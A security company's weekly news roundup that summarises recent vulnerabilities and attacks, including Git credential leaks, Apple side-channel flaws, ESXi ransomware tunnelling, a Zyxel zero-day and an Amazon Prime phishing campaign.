Phishing campaign targets Amazon Prime members, Apple vulnerability being exploited, and Zyxel routers under attack...
Welcome to this week’s Security News. We’ve collated the best articles from the around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly.
Vulnerabilities and Patches
GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs
Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user’s Git credentials.
“Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper,” GMO Flatt Security researcher Ry0taK, who discovered the flaws, said in an analysis published Sunday. “Because of improper handling of messages, many projects were vulnerable to credential leakage in various ways.”
The list of identified vulnerabilities, dubbed Clone2Leak, is as follows –
- CVE-2025-23040 (CVSS score: 6.6) – Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop
- CVE-2024-50338 (CVSS score: 7.4) – Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager
- CVE-2024-53263 (CVSS score: 8.5) – Git LFS permits retrieval of credentials via crafted HTTP URLs
- CVE-2024-53858 (CVSS score: 6.5) – Recursive repository cloning in GitHub CLI can leak authentication tokens to non-GitHub submodule hosts
While the credential helper is designed to return a message containing the credentials that are separated by the newline control character (“\n”), the research found that GitHub Desktop is susceptible to a case of carriage return (“\r”) smuggling whereby injecting the character into a crafted URL can leak the credentials to an attacker-controlled host.
New SLAP & FLOP Attacks Expose Apple M-Series Chips to Speculative Execution Exploits
A team of security researchers from Georgia Institute of Technology and Ruhr University Bochum has demonstrated two new side-channel attacks targeting Apple silicon that could be exploited to leak sensitive information from web browsers like Safari and Google Chrome.
The attacks have been codenamed Data Speculation Attacks via Load Address Prediction on Apple Silicon (SLAP) and Breaking the Apple M3 CPU via False Load Output Predictions (FLOP). Apple was notified of the issues in May and September 2024, respectively.
The vulnerabilities, like the previously disclosed iLeakage attack, build on Spectre, arising when speculative execution “backfires,” leaving traces of mispredictions in the CPU’s microarchitectural state and the cache.
Speculative execution refers to a performance optimization mechanism in modern processors that are aimed at predicting the control flow the CPU should take and execute instructions along the branch beforehand.
In the event of a misprediction, the results of the transient instructions are discarded and revert all changes made to the state following the prediction.
These attacks leverage the fact that speculative execution leaves traces to force a CPU to make a misprediction and execute a series of transient instructions, whose value could then be inferred through a side-channel even after the CPU rolls back all the changes to the state due to the misprediction.
Cyber Attacks
Ransomware Targets ESXi Systems via Stealthy SSH Tunnels for C2 Operations
Cybersecurity researchers have found that ransomware attacks targeting ESXi systems are also leveraging the access to repurpose the appliances as a conduit to tunnel traffic to command-and-control (C2) infrastructure and stay under the radar.
“ESXi appliances, which are unmonitored, are increasingly exploited as a persistence mechanism and gateway to access corporate networks widely,” Sygnia researchers Aaron (Zhongyuan) Hau and Ren Jie Yow said in a report published last week.
“Threat actors use these platforms by adopting ‘living-off-the-land’ techniques and using native tools like SSH to establish a SOCKS tunnel between their C2 servers and the compromised environment.”
In doing so, the idea is to blend into legitimate traffic and establish long-term persistence on the compromised network with little-to-no detection by security controls.
The cybersecurity company said in many of its incident response engagements, ESXi systems were compromised either by using admin credentials or leveraging a known security vulnerability to get around authentication protections. Subsequently, the threat actors have been found to set up a tunnel using SSH or other tools with equivalent functionality.
“Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.
Hackers Actively Exploiting Zyxel 0-day Vulnerability to Execute Arbitrary Commands
A significant zero-day vulnerability in Zyxel CPE series devices, identified as CVE-2024-40891, is being actively exploited by attackers.
This vulnerability enables attackers to execute arbitrary commands on affected devices, posing significant risks of system compromise, data theft, and network infiltration.
Over 1,500 infected devices have been discovered to be susceptible to this exploit, according to Censys scans; the vulnerability has not been fixed or publicly disclosed.
The vulnerability is a command injection flaw in the telnet interface of Zyxel CPE devices. It allows unauthenticated attackers to execute arbitrary commands by exploiting service accounts such as “supervisor” or “zyuser.”
The command injection vulnerability arises from improper input validation in the telnet management interface of Zyxel CPE devices.
Apple Zero-day Vulnerability Actively Exploited to Attack iPhone Users
Apple has released critical security updates to address a zero-day vulnerability actively exploited in attacks targeting iPhone users.
The flaw, identified as CVE-2025-24085, is a use-after-free issue in the Core Media framework, which handles multimedia processing across Apple’s ecosystem.
This vulnerability, with a CVSS score of 9.8, allows malicious applications to elevate privileges, posing significant risks to user devices.
The Core Media framework is integral to Apple’s media processing pipeline, supporting high-level frameworks like AVFoundation. The vulnerability stems from improper memory management, enabling attackers to exploit the flaw for privilege escalation.
Apple acknowledged reports that this issue has been actively exploited against devices running versions of iOS prior to iOS 17.2.
In Other News...
Microsoft Entra ID Bug Allow Unprivileged Users to Change Their User Principal Names
Microsoft has allowed unprivileged users to update their own User Principal Names (UPNs) in Entra ID, sparking concerns over security and administrative oversight.
To clarify, an unprivileged user can update the user principal name (UPN) for their own Entra ID account but not for others. However, it’s hard to see why any organization would intentionally allow users to modify such a fundamental attribute like a UPN, yet this capability exists.
This change, which can be executed through the Entra admin center or tools like the Microsoft Graph PowerShell SDK, has raised questions about its necessity and potential risks.
Previously, UPN updates were typically restricted to administrators. However, it is now possible for any user to modify their UPN, which is a critical identifier for accessing Microsoft services.
Testing confirmed that users could navigate to their account properties in the Entra admin center and directly edit their UPNs. A similar update can also be performed using the Microsoft Graph PowerShell SDK, as both interfaces rely on the Microsoft Graph Users API.
New Phishing Campaign Mimic Amazon Prime Membership To Steal Credit Card Data
A sophisticated phishing campaign targeting Amazon Prime members has been uncovered, aiming to steal credit card information and other sensitive data.
Cybersecurity experts have identified a complex attack chain that leverages PDF attachments, redirects, and cleverly crafted phishing sites to deceive unsuspecting victims.
The campaign begins with malicious PDF files containing links to phishing sites impersonating Amazon.
Researchers have collected 31 such PDF files, each with a unique SHA256 hash.
While the security analysts at Unit42 noted that these PDFs redirect users through a series of URLs, ultimately leading to a fraudulent site designed to capture credit card information.